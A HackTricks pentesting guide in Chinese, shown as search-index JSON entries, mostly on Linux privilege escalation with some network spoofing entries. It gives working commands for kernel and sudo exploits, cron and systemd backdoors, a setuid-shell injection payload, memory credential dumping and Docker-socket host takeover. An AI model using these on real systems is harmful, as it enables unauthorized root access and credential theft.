HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Checklist - Linux Privilege Escalation » 其他技巧","id":"1365","title":"其他技巧"},"1366":{"body":"Reading time: 79 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Linux Privilege Escalation","id":"1366","title":"Linux Privilege Escalation"},"1367":{"body":"","breadcrumbs":"Linux Privilege Escalation » 系统信息","id":"1367","title":"系统信息"},"1368":{"body":"让我们开始获取关于正在运行的 OS 的一些信息 bash (cat /proc/version || uname -a ) 2>/dev/null\\nlsb_release -a 2>/dev/null # old, not by default on many systems\\ncat /etc/os-release 2>/dev/null # universal on modern systems","breadcrumbs":"Linux Privilege Escalation » OS 信息","id":"1368","title":"OS 信息"},"1369":{"body":"如果你对 PATH 变量中的任何文件夹具有写入权限 ,你可能能够劫持某些库或二进制文件: bash echo $PATH","breadcrumbs":"Linux Privilege Escalation » Path","id":"1369","title":"Path"},"137":{"body":"浏览器通常使用 Web Proxy Auto-Discovery (WPAD) 协议自动获取代理设置 。这涉及从服务器获取配置(例如通过 URL \\"http://wpad.example.org/wpad.dat\\")。客户端发现该服务器可以通过多种机制发生: 通过 DHCP ,使用特殊的 252 条目来进行发现。 通过 DNS ,在本地域中搜索名为 wpad 的主机名。 通过 Microsoft LLMNR and NBT-NS ,作为 DNS 查询失败时的回退机制。 工具 Responder 利用该协议充当 恶意 WPAD 服务器 。它使用 DHCP、DNS、LLMNR 和 NBT-NS 误导客户端连接到它。要深入了解如何使用 Responder 冒充服务,请 查看此处 。","breadcrumbs":"Pentesting Network » Spoofing WPAD","id":"137","title":"Spoofing WPAD"},"1370":{"body":"环境变量中是否包含有趣的信息、密码或 API 密钥? 
bash (env || set) 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 环境信息","id":"1370","title":"环境信息"},"1371":{"body":"检查 kernel 版本,查看是否存在可以用来 escalate privileges 的 exploit bash cat /proc/version\\nuname -a\\nsearchsploit \\"Linux Kernel\\" 你可以在这里找到一个不错的 vulnerable kernel list 和一些已经 compiled exploits : https://github.com/lucyoa/kernel-exploits and exploitdb sploits . 其他可以找到一些 compiled exploits 的站点: https://github.com/bwbwbwbw/linux-exploit-binaries , https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack 要从该网站提取所有 vulnerable kernel versions,你可以做: bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep \\"Kernels: \\" | cut -d \\":\\" -f 2 | cut -d \\"<\\" -f 1 | tr -d \\",\\" | tr \' \' \'\\\\n\' | grep -v \\"^\\\\d\\\\.\\\\d$\\" | sort -u -r | tr \'\\\\n\' \' \' 可以帮助查找内核漏洞利用的工具有: linux-exploit-suggester.sh linux-exploit-suggester2.pl linuxprivchecker.py (在受害主机上执行,仅检查 2.x 内核的漏洞利用) 始终 在 Google 上搜索内核版本 ,可能你的内核版本已经出现在某个内核漏洞利用中,这样你就能确定该漏洞利用是否有效。","breadcrumbs":"Linux Privilege Escalation » Kernel exploits","id":"1371","title":"Kernel exploits"},"1372":{"body":"Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 bash # make dirtycow stable\\necho 0 > /proc/sys/vm/dirty_writeback_centisecs\\ng++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/PoCs\\nhttps://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c","breadcrumbs":"Linux Privilege Escalation » CVE-2016-5195 (DirtyCow)","id":"1372","title":"CVE-2016-5195 (DirtyCow)"},"1373":{"body":"基于出现在以下位置的易受攻击的 sudo 版本: bash searchsploit sudo 你可以使用这个 grep 检查 sudo 版本是否存在漏洞。 bash sudo -V | grep \\"Sudo ver\\" | grep \\"1\\\\.[01234567]\\\\.[0-9]\\\\+\\\\|1\\\\.8\\\\.1[0-9]\\\\*\\\\|1\\\\.8\\\\.2[01234567]\\" sudo < v1.28 来自 @sickrov sudo -u#-1 /bin/bash","breadcrumbs":"Linux Privilege Escalation » Sudo 版本","id":"1373","title":"Sudo 版本"},"1374":{"body":"查看 smasher2 box of HTB 
,了解如何利用该 vuln 的 示例 bash dmesg 2>/dev/null | grep \\"signature\\"","breadcrumbs":"Linux Privilege Escalation » Dmesg 签名验证失败","id":"1374","title":"Dmesg 签名验证失败"},"1375":{"body":"bash date 2>/dev/null #Date\\n(df -h || lsblk) #System stats\\nlscpu #CPU info\\nlpstat -a 2>/dev/null #Printers info","breadcrumbs":"Linux Privilege Escalation » 更多系统枚举","id":"1375","title":"更多系统枚举"},"1376":{"body":"","breadcrumbs":"Linux Privilege Escalation » 列举可能的防御措施","id":"1376","title":"列举可能的防御措施"},"1377":{"body":"bash if [ `which aa-status 2>/dev/null` ]; then\\naa-status\\nelif [ `which apparmor_status 2>/dev/null` ]; then\\napparmor_status\\nelif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then\\nls -d /etc/apparmor*\\nelse\\necho \\"Not found AppArmor\\"\\nfi","breadcrumbs":"Linux Privilege Escalation » AppArmor","id":"1377","title":"AppArmor"},"1378":{"body":"bash ((uname -r | grep \\"\\\\-grsec\\" >/dev/null 2>&1 || grep \\"grsecurity\\" /etc/sysctl.conf >/dev/null 2>&1) && echo \\"Yes\\" || echo \\"Not found grsecurity\\")","breadcrumbs":"Linux Privilege Escalation » Grsecurity","id":"1378","title":"Grsecurity"},"1379":{"body":"bash (which paxctl-ng paxctl >/dev/null 2>&1 && echo \\"Yes\\" || echo \\"Not found PaX\\")","breadcrumbs":"Linux Privilege Escalation » PaX","id":"1379","title":"PaX"},"138":{"body":"你可以在网络中提供不同的服务,试图 诱骗用户 输入某些 明文凭证 。关于此攻击的 更多信息 见 Spoofing SSDP and UPnP Devices 。","breadcrumbs":"Pentesting Network » Spoofing SSDP and UPnP devices","id":"138","title":"Spoofing SSDP and UPnP devices"},"1380":{"body":"bash (grep \\"exec-shield\\" /etc/sysctl.conf || echo \\"Not found Execshield\\")","breadcrumbs":"Linux Privilege Escalation » Execshield","id":"1380","title":"Execshield"},"1381":{"body":"bash (sestatus 2>/dev/null || echo \\"Not found sestatus\\")","breadcrumbs":"Linux Privilege Escalation » SElinux(安全增强的 Linux)","id":"1381","title":"SElinux(安全增强的 Linux)"},"1382":{"body":"bash cat /proc/sys/kernel/randomize_va_space 2>/dev/null\\n#If 0, not 
enabled","breadcrumbs":"Linux Privilege Escalation » ASLR","id":"1382","title":"ASLR"},"1383":{"body":"如果你在 docker container 内,你可以尝试从中逃逸: Docker Security","breadcrumbs":"Linux Privilege Escalation » Docker Breakout","id":"1383","title":"Docker Breakout"},"1384":{"body":"检查 what is mounted and unmounted 、挂载位置以及原因。如果有任何未挂载的设备,你可以尝试将其 mount 并检查是否有敏感信息。 bash ls /dev 2>/dev/null | grep -i \\"sd\\"\\ncat /etc/fstab 2>/dev/null | grep -v \\"^#\\" | grep -Pv \\"\\\\W*\\\\#\\" 2>/dev/null\\n#Check if credentials in fstab\\ngrep -E \\"(user|username|login|pass|password|pw|credentials)[=:]\\" /etc/fstab /etc/mtab 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 驱动器","id":"1384","title":"驱动器"},"1385":{"body":"列举有用的二进制文件 bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null 另外,检查是否安装了 任何编译器 。如果需要使用某些 kernel exploit,这很有用,因为建议在将要使用它的机器上(或在一台类似的机器上)进行编译。 bash (dpkg --list 2>/dev/null | grep \\"compiler\\" | grep -v \\"decompiler\\\\|lib\\" 2>/dev/null || yum list installed \'gcc*\' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r \\"/gcc[0-9\\\\.-]\\\\+$\\" 2>/dev/null | grep -v \\"/doc/\\")","breadcrumbs":"Linux Privilege Escalation » 有用的软件","id":"1385","title":"有用的软件"},"1386":{"body":"检查 已安装的软件包和服务的版本 。可能存在旧的 Nagios 版本(例如),可以被利用来进行 escalating privileges… 建议手动检查更可疑的已安装软件的版本。 bash dpkg -l #Debian\\nrpm -qa #Centos If you have SSH access to the machine you could also use openVAS to check for outdated and vulnerable software installed inside the machine. [!NOTE] > 请注意,这些命令会显示大量大多无用的信息,因此建议使用 OpenVAS 或类似工具来检查已安装的软件版本是否容易受到已知 exploits 的利用。","breadcrumbs":"Linux Privilege Escalation » Vulnerable Software Installed","id":"1386","title":"Vulnerable Software Installed"},"1387":{"body":"查看正在执行的 哪些进程 ,并检查是否有任何进程拥有 比它应有的更多权限 (例如由 root 运行的 tomcat?) 
bash ps aux\\nps -ef\\ntop -n 1 始终检查是否有可能的 electron/cef/chromium debuggers 正在运行,你可以滥用它来提升权限 。 Linpeas 通过检查进程命令行中的 --inspect 参数来检测它们。 另外 检查你对进程二进制文件的权限 ,也许你可以覆盖某些可执行文件。","breadcrumbs":"Linux Privilege Escalation » Processes","id":"1387","title":"Processes"},"1388":{"body":"你可以使用像 pspy 这样的工具来监控进程。这在识别经常被执行或在满足一组条件时触发的易受攻击进程时非常有用。","breadcrumbs":"Linux Privilege Escalation » 进程监控","id":"1388","title":"进程监控"},"1389":{"body":"一些服务器服务会在内存中以 明文 保存凭据。 通常你需要 root privileges 来读取属于其他用户的进程内存,因此这通常在你已经是 root 并想发现更多凭据时更有用。 但是,记住 作为普通用户你可以读取你自己拥有的进程的内存 。 warning 注意如今大多数机器 默认不允许 ptrace ,这意味着你无法转储属于其他用户的进程(如果你是非特权用户)。 文件 /proc/sys/kernel/yama/ptrace_scope 控制 ptrace 的可访问性: kernel.yama.ptrace_scope = 0 : 所有进程都可以被调试,只要它们具有相同的 uid。这是 ptracing 的传统工作方式。 kernel.yama.ptrace_scope = 1 : 只有父进程可以被调试。 kernel.yama.ptrace_scope = 2 : 只有管理员可以使用 ptrace,因为它需要 CAP_SYS_PTRACE 能力。 kernel.yama.ptrace_scope = 3 : 不能用 ptrace 跟踪任何进程。设置后需要重启才能再次启用 ptrace。 GDB 如果你可以访问某个 FTP 服务(例如)的内存,你可以获取 Heap 并在其中搜索凭据。 bash gdb -p \\n(gdb) info proc mappings\\n(gdb) q\\n(gdb) dump memory /tmp/mem_ftp \\n(gdb) q\\nstrings /tmp/mem_ftp #User and password GDB 脚本 dump-memory.sh #!/bin/bash\\n#./dump-memory.sh \\ngrep rw-p /proc/$1/maps \\\\\\n| sed -n \'s/^\\\\([0-9a-f]*\\\\)-\\\\([0-9a-f]*\\\\) .*$/\\\\1 \\\\2/p\' \\\\\\n| while read start stop; do \\\\\\ngdb --batch --pid $1 -ex \\\\\\n\\"dump memory $1-$start-$stop.dump 0x$start 0x$stop\\"; \\\\\\ndone /proc/$pid/maps & /proc/$pid/mem 对于给定的进程 ID, maps 显示该进程的内存如何映射 的虚拟地址空间;它还显示 每个映射区域的权限 。该 mem 伪文件 暴露了进程的内存本身 。从 maps 文件我们可以知道哪些 内存区域是可读的 以及它们的偏移。我们使用这些信息 在 mem 文件中定位并转储所有可读区域 到一个文件。 bash procdump()\\n(\\ncat /proc/$1/maps | grep -Fv \\".so\\" | grep \\" 0 \\" | awk \'{print $1}\' | ( IFS=\\"-\\"\\nwhile read a b; do\\ndd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \\\\\\nskip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of=\\"$1_mem_$a.bin\\"\\ndone )\\ncat $1*.bin > $1.dump\\nrm $1*.bin\\n) /dev/mem /dev/mem 提供对系统的 物理 内存的访问,而不是虚拟内存。内核的虚拟地址空间可以使用 /dev/kmem 
访问。 通常,/dev/mem 仅对 root 和 kmem 组可读。 strings /dev/mem -n10 | grep -i PASS","breadcrumbs":"Linux Privilege Escalation » 进程内存","id":"1389","title":"进程内存"},"139":{"body":"这种攻击与 ARP Spoofing 在 IPv6 环境中非常相似。你可以让受害者认为网关的 IPv6 地址对应的是攻击者的 MAC 地址。 bash sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested\\nsudo fake_advertise6 -r -w 2 eth0 #This option will send the Neighbor Advertisement packet every 2 seconds","breadcrumbs":"Pentesting Network » IPv6 Neighbor Spoofing","id":"139","title":"IPv6 Neighbor Spoofing"},"1390":{"body":"ProcDump 是对 Sysinternals 套件中用于 Windows 的经典 ProcDump 工具在 Linux 上的重新构想。可在以下地址获取: https://github.com/Sysinternals/ProcDump-for-Linux procdump -p 1714 ProcDump v1.2 - Sysinternals process dump utility\\nCopyright (C) 2020 Microsoft Corporation. All rights reserved. Licensed under the MIT license.\\nMark Russinovich, Mario Hewardt, John Salem, Javid Habibi\\nMonitors a process and writes a dump file when the process meets the\\nspecified criteria. Process: sleep (1714)\\nCPU Threshold: n/a\\nCommit Threshold:\\tn/a\\nThread Threshold: n/a\\nFile descriptor Threshold: n/a\\nSignal: n/a\\nPolling interval (ms):\\t1000\\nThreshold (s):\\t10\\nNumber of Dumps:\\t1\\nOutput directory for core dumps:\\t. Press Ctrl-C to end monitoring without terminating the process. [20:20:58 - WARN]: Procdump not running with elevated credentials. 
If your uid does not match the uid of the target process procdump will not be able to capture memory dumps\\n[20:20:58 - INFO]: Timed:\\n[20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714","breadcrumbs":"Linux Privilege Escalation » ProcDump 用于 linux","id":"1390","title":"ProcDump 用于 linux"},"1391":{"body":"要 dump 进程内存,你可以使用: https://github.com/Sysinternals/ProcDump-for-Linux https://github.com/hajzer/bash-memory-dump (root) - _你可以手动移除 root 要求并 dump 你拥有的进程 Script A.5 来自 https://www.delaat.net/rp/2016-2017/p97/report.pdf (需要 root)","breadcrumbs":"Linux Privilege Escalation » 工具","id":"1391","title":"工具"},"1392":{"body":"手动示例 如果发现 authenticator 进程正在运行: bash ps -ef | grep \\"authenticator\\"\\nroot 2027 2025 0 11:46 ? 00:00:00 authenticator 你可以 dump the process(参见前面的章节以了解 dump the memory of a process 的不同方法),并在 memory 中搜索 credentials: bash ./dump-memory.sh 2027\\nstrings *.dump | grep -i password mimipenguin 该工具 https://github.com/huntergregal/mimipenguin 会 从内存中窃取明文凭证 并从一些 已知文件 中获取凭证。它需要 root 权限才能正常工作。 功能 进程名称 GDM password (Kali Desktop, Debian Desktop) gdm-password Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) gnome-keyring-daemon LightDM (Ubuntu Desktop) lightdm VSFTPd (Active FTP Connections) vsftpd Apache2 (Active HTTP Basic Auth Sessions) apache2 OpenSSH (Active SSH Sessions - Sudo Usage) sshd: 搜索正则/ truffleproc bash # un truffleproc.sh against your current Bash shell (e.g. $$)\\n./truffleproc.sh $$\\n# coredumping pid 6174\\nReading symbols from od...\\nReading symbols from /usr/lib/systemd/systemd...\\nReading symbols from /lib/systemd/libsystemd-shared-247.so...\\nReading symbols from /lib/x86_64-linux-gnu/librt.so.1...\\n[...]\\n# extracting strings to /tmp/tmp.o6HV0Pl3fe\\n# finding secrets\\n# results in /tmp/tmp.o6HV0Pl3fe/results.txt","breadcrumbs":"Linux Privilege Escalation » 从进程内存获取凭证","id":"1392","title":"从进程内存获取凭证"},"1393":{"body":"检查是否有任何计划任务易受攻击。也许你可以利用由 root 执行的脚本(wildcard vuln? 能否修改 root 使用的文件? 使用 symlinks? 
在 root 使用的目录中创建特定文件?)。 bash crontab -l\\nls -al /etc/cron* /etc/at*\\ncat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v \\"^#\\"","breadcrumbs":"Linux Privilege Escalation » Scheduled/Cron jobs","id":"1393","title":"Scheduled/Cron jobs"},"1394":{"body":"例如,在 /etc/crontab 你可以找到 PATH: PATH= /home/user :/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin (注意用户 \\"user\\" 对 /home/user 有写权限) 如果在这个 crontab 中 root 用户尝试在不设置 PATH 的情况下执行某个命令或脚本。例如: * * * * root overwrite.sh 那么,你可以通过以下方式获得 root shell: bash echo \'cp /bin/bash /tmp/bash; chmod +s /tmp/bash\' > /home/user/overwrite.sh\\n#Wait cron job to be executed\\n/tmp/bash -p #The effective uid and gid to be set to the real uid and gid","breadcrumbs":"Linux Privilege Escalation » Cron 路径","id":"1394","title":"Cron 路径"},"1395":{"body":"如果一个由 root 执行的脚本在命令中包含 “ * ”,你可以利用这一点导致意想不到的结果(比如 privesc)。示例: bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called \\"-e sh myscript.sh\\" so the script will execute our script 如果通配符前面有路径比如 /some/path/ * ,就不会受到影响(即使 ./ * 也不)。 阅读以下页面以获取更多通配符利用技巧: Wildcards Spare tricks","breadcrumbs":"Linux Privilege Escalation » Cron 使用带通配符的脚本 (Wildcard Injection)","id":"1395","title":"Cron 使用带通配符的脚本 (Wildcard Injection)"},"1396":{"body":"Bash 在 ((...)), $((...)) 和 let 中进行算术求值之前会执行 parameter expansion 和 command substitution。如果 root cron/parser 读取不受信任的日志字段并将其传入算术上下文,攻击者可以注入一个 command substitution $(...),当 cron 运行时以 root 身份执行。 Why it works: 在 Bash 中,expansions 按如下顺序发生:parameter/variable expansion、command substitution、arithmetic expansion,然后是 word splitting 和 pathname expansion。所以像 $(/bin/bash -c \'id > /tmp/pwn\')0 这样的值会先被替换(运行该命令),之后剩下的数字 0 会用于算术运算,从而使脚本继续而不会报错。 典型的易受攻击的模式: bash #!/bin/bash\\n# Example: parse a log and \\"sum\\" a count field coming from the log\\nwhile IFS=\',\' read -r ts user count rest; do\\n# count is untrusted if the log is attacker-controlled\\n(( total += count )) # or: let \\"n=$count\\"\\ndone < 
/var/www/app/log/application.log Exploitation: 让攻击者控制的文本写入被解析的日志,使看起来像数字的字段包含 command substitution 并以数字结尾。确保你的命令不要向 stdout 输出(或将其重定向),以便算术表达式保持有效。 bash # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim):\\n$(/bin/bash -c \'cp /bin/bash /tmp/sh; chmod +s /tmp/sh\')0\\n# When the root cron parser evaluates (( total += count )), your command runs as root.","breadcrumbs":"Linux Privilege Escalation » Bash arithmetic expansion injection in cron log parsers","id":"1396","title":"Bash arithmetic expansion injection in cron log parsers"},"1397":{"body":"如果你 可以修改 cron script (由 root 执行),可以非常容易地获得一个 shell: bash echo \'cp /bin/bash /tmp/bash; chmod +s /tmp/bash\' > \\n#Wait until it is executed\\n/tmp/bash -p 如果由 root 执行的脚本使用一个 你拥有完全访问权限的目录 ,那么删除该目录并 创建一个指向另一个由你控制并提供脚本的 symlink 目录 可能会很有用。 bash ln -d -s ","breadcrumbs":"Linux Privilege Escalation » Cron script overwriting and symlink","id":"1397","title":"Cron script overwriting and symlink"},"1398":{"body":"你可以监视进程,查找每隔 1、2 或 5 分钟执行的进程。也许你可以利用它并 escalate privileges。 例如,要 在 1 分钟内每 0.1s 监控 、 按执行次数最少排序 并删除被执行次数最多的命令,你可以做: bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v \\"\\\\[\\" | sed \'/^.\\\\{200\\\\}./d\' | sort | grep -E -v \\"\\\\s*[6-9][0-9][0-9]|\\\\s*[0-9][0-9][0-9][0-9]\\"; rm /tmp/monprocs.tmp; 你也可以使用 pspy (它会监视并列出每个启动的进程)。","breadcrumbs":"Linux Privilege Escalation » 频繁的 cron jobs","id":"1398","title":"频繁的 cron jobs"},"1399":{"body":"可以创建一个 cronjob,通过 在注释后放置回车符 (没有换行字符),使该 cron job 生效。示例(注意回车字符): bash #This is a comment inside a cron config file\\\\r* * * * * echo \\"Surprise!\\"","breadcrumbs":"Linux Privilege Escalation » 隐形 cron jobs","id":"1399","title":"隐形 cron jobs"},"14":{"body":"Last Tower Solutions 提供专门的网络安全服务,面向 教育 和 金融科技 机构,重点关注 渗透测试、云安全评估 和 合规准备 (SOC 2、PCI-DSS、NIST)。我们的团队包括 OSCP 和 CISSP 认证专业人员 ,为每次合作带来深厚的技术专长和行业标准的见解。 我们超越自动化扫描,提供 手动、基于情报的测试 
,针对高风险环境量身定制。从保护学生记录到保护金融交易,我们帮助组织捍卫最重要的事务。 “高质量的防御需要了解进攻,我们通过理解提供安全。” 通过访问我们的 博客 了解网络安全的最新动态。 Last Tower Solutions | Cybersecurity Consulting for Educational Institutions","breadcrumbs":"HackTricks » Last Tower Solutions","id":"14","title":"Last Tower Solutions"},"140":{"body":"一些 OS 默认会根据网络中发送的 RA 数据包配置网关。要将攻击者声明为 IPv6 router,你可以使用: bash sysctl -w net.ipv6.conf.all.forwarding=1 4\\nip route add default via dev wlan0\\nfake_router6 wlan0 fe80::01/16","breadcrumbs":"Pentesting Network » IPv6 Router Advertisement Spoofing/Flooding","id":"140","title":"IPv6 Router Advertisement Spoofing/Flooding"},"1400":{"body":"","breadcrumbs":"Linux Privilege Escalation » 服务","id":"1400","title":"服务"},"1401":{"body":"检查是否可以写入任何 .service 文件。如果可以,你 可以修改它 ,使其在服务 启动 、 重启 或 停止 时 执行 你的 backdoor (可能需要等到机器重启)。 例如,在 .service 文件中创建你的 backdoor,使用 ExecStart=/tmp/script.sh","breadcrumbs":"Linux Privilege Escalation » 可写的 .service 文件","id":"1401","title":"可写的 .service 文件"},"1402":{"body":"请记住,如果你对由服务执行的二进制文件具有 写权限 ,你可以将它们更改为 backdoors,这样当服务被重新执行时,backdoors 就会被执行。","breadcrumbs":"Linux Privilege Escalation » 可写的服务二进制文件","id":"1402","title":"可写的服务二进制文件"},"1403":{"body":"你可以通过以下方式查看 systemd 使用的 PATH: bash systemctl show-environment 如果你发现可以在该路径的任一文件夹中 write ,你可能能够 escalate privileges 。你需要搜索在服务配置文件中使用的 相对路径 ,例如: bash ExecStart=faraday-server\\nExecStart=/bin/sh -ec \'ifup --allow=hotplug %I; ifquery --state %I\'\\nExecStop=/bin/sh \\"uptux-vuln-bin3 -stuff -hello\\" 然后,在你可写入的 systemd PATH folder 中创建一个与相对路径二进制文件同名的 executable ,当服务被要求执行易受攻击的操作( Start 、 Stop 、 Reload )时,你的 backdoor 将被执行(非特权用户通常无法 start/stop services,但检查是否可以使用 sudo -l)。 Learn more about services with man systemd.service.","breadcrumbs":"Linux Privilege Escalation » systemd PATH - 相对路径","id":"1403","title":"systemd PATH - 相对路径"},"1404":{"body":"Timers 是 systemd 的 unit 文件,名称以 **.timer** 结尾,用于控制 **.service** 文件或事件。Timers 可以作为 cron 的替代,因为它们内建对日历时间事件 (calendar time events) 和单调时间事件 (monotonic time events) 的支持,并且可以异步运行。 You can enumerate all 
the timers with: bash systemctl list-timers --all","breadcrumbs":"Linux Privilege Escalation » Timers","id":"1404","title":"Timers"},"1405":{"body":"如果你可以修改一个 timer,你可以让它执行一些 systemd.unit 的现有项(比如 .service 或 .target) bash Unit=backdoor.service 在文档中可以看到 Unit 是什么: 在该 timer 到期时要激活的 unit。参数是一个 unit name,其后缀不是 \\".timer\\"。如果未指定,该值默认为一个 service,其名称与 timer unit 相同,但后缀不同。(见上文。)建议被激活的 unit name 与 timer unit 的 unit name 除后缀外保持一致。 因此,要滥用此权限,你需要: 找到某个 systemd unit(例如 .service),它正在 执行一个可写的 binary 找到某个 systemd unit,它正在 执行一个相对路径 ,并且你对 systemd PATH 拥有 writable privileges (以冒充该可执行文件) 使用 man systemd.timer 了解有关 timers 的更多信息。","breadcrumbs":"Linux Privilege Escalation » 可写的 timer","id":"1405","title":"可写的 timer"},"1406":{"body":"要启用 timer,你需要 root 权限并执行: bash sudo systemctl enable backu2.timer\\nCreated symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. 注意, timer 是通过在 /etc/systemd/system/.wants/.timer 上创建一个符号链接来 激活 的。","breadcrumbs":"Linux Privilege Escalation » 启用 Timer","id":"1406","title":"启用 Timer"},"1407":{"body":"Unix Domain Sockets (UDS) 在客户端-服务器模型中允许在同一台或不同机器上进行 进程间通信 。它们使用标准 Unix 描述符文件进行主机间通信,并通过 .socket 文件进行配置。 套接字可以使用 .socket 文件进行配置。 使用 man systemd.socket 了解更多关于套接字的信息。 在此文件中,可以配置多个有趣的参数: ListenStream, ListenDatagram, ListenSequentialPacket, ListenFIFO, ListenSpecial, ListenNetlink, ListenMessageQueue, ListenUSBFunction: 这些选项各不相同,但总体上用于 指示将在哪里监听 该套接字(AF_UNIX 套接字文件的路径、要监听的 IPv4/6 和/或端口号等)。 Accept: 接受一个 boolean 参数。如果 true ,则会为每个传入连接生成一个 service 实例 ,并且仅将连接套接字传递给它。如果 false ,所有监听套接字本身将 传递给启动的 service 单元 ,并且只为所有连接生成一个 service 单元。对于 datagram 套接字和 FIFOs,此值被忽略,在那里单个 service 单元无条件处理所有传入流量。 默认值为 false 。出于性能原因,建议在编写新的 daemon 时以适合 Accept=no 的方式编写。 ExecStartPre, ExecStartPost: 接受一个或多个命令行,在监听的 套接字 /FIFOs 分别被 创建 并绑定之前或之后 执行 。命令行的第一个词元必须是绝对文件名,随后是进程的参数。 ExecStopPre, ExecStopPost: 额外的 命令 ,在监听的 套接字 /FIFOs 分别被 关闭 并移除之前或之后 执行 。 Service: 指定在 传入流量 时要 激活 的 service 单元名称。此设置仅允许用于 Accept=no 的套接字。默认使用与套接字同名(替换后缀)的 
service。在大多数情况下,不需要使用此选项。","breadcrumbs":"Linux Privilege Escalation » 套接字","id":"1407","title":"套接字"},"1408":{"body":"如果你发现一个 可写 的 .socket 文件,你可以在 [Socket] 部分的开头 添加 类似 ExecStartPre=/home/kali/sys/backdoor 的内容,backdoor 将在套接字被创建之前执行。因此,你 可能需要等待机器重启。 Note that the system must be using that socket file configuration or the backdoor won\'t be executed","breadcrumbs":"Linux Privilege Escalation » 可写的 .socket 文件","id":"1408","title":"可写的 .socket 文件"},"1409":{"body":"如果你 发现任何可写的套接字 ( 这里我们指的是 Unix Sockets,而不是配置的 .socket 文件 ),那么 你可以与该套接字进行通信 ,并可能利用其中的漏洞。","breadcrumbs":"Linux Privilege Escalation » 可写的套接字","id":"1409","title":"可写的套接字"},"141":{"body":"默认情况下,一些 OS 会尝试通过读取网络中的 DHCPv6 包来配置 DNS。然后,攻击者可以发送 DHCPv6 包,将自己配置为 DNS。DHCP 也会为受害者提供 IPv6 地址。 bash dhcp6.spoof on\\ndhcp6.spoof.domains mitm6","breadcrumbs":"Pentesting Network » IPv6 DHCP spoofing","id":"141","title":"IPv6 DHCP spoofing"},"1410":{"body":"bash netstat -a -p --unix","breadcrumbs":"Linux Privilege Escalation » 枚举 Unix 套接字","id":"1410","title":"枚举 Unix 套接字"},"1411":{"body":"bash #apt-get install netcat-openbsd\\nnc -U /tmp/socket #Connect to UNIX-domain stream socket\\nnc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat\\nsocat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type 利用示例: Socket Command Injection","breadcrumbs":"Linux Privilege Escalation » 原始连接","id":"1411","title":"原始连接"},"1412":{"body":"注意,可能存在一些用于监听 HTTP 请求的 sockets( 我不是指 .socket 文件,而是作为 unix sockets 的文件 )。你可以用下面的命令检查: bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index 如果该 socket 对 HTTP 请求有响应 ,那么你可以 与其通信 ,并且可能 利用某些漏洞 。","breadcrumbs":"Linux Privilege Escalation » HTTP sockets","id":"1412","title":"HTTP sockets"},"1413":{"body":"Docker socket,通常位于 /var/run/docker.sock,是一个需要保护的重要文件。默认情况下,它对 root 用户和 docker 组的成员可写。拥有对该 socket 的写权限可能导致权限提升。下面是如何实现以及在无法使用 Docker CLI 时的替代方法的分解说明。 Privilege Escalation with Docker CLI 如果你对 Docker socket 拥有写权限,你可以使用以下命令提升权限: bash docker -H 
unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash\\ndocker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh 这些命令允许你运行一个容器,从而以 root 权限访问宿主机文件系统。 Using Docker API Directly 在 Docker CLI 不可用的情况下,仍可以使用 Docker API 和 curl 命令操作 Docker socket。 List Docker Images: 检索可用镜像列表。 bash curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json Create a Container: 发送请求创建一个挂载宿主机根目录的容器。 bash curl -XPOST -H \\"Content-Type: application/json\\" --unix-socket /var/run/docker.sock -d \'{\\"Image\\":\\"\\",\\"Cmd\\":[\\"/bin/sh\\"],\\"DetachKeys\\":\\"Ctrl-p,Ctrl-q\\",\\"OpenStdin\\":true,\\"Mounts\\":[{\\"Type\\":\\"bind\\",\\"Source\\":\\"/\\",\\"Target\\":\\"/host_root\\"}]}\' http://localhost/containers/create Start the newly created container: bash curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start Attach to the Container: 使用 socat 建立与容器的连接,从而可以在其中执行命令。 bash socat - UNIX-CONNECT:/var/run/docker.sock\\nPOST 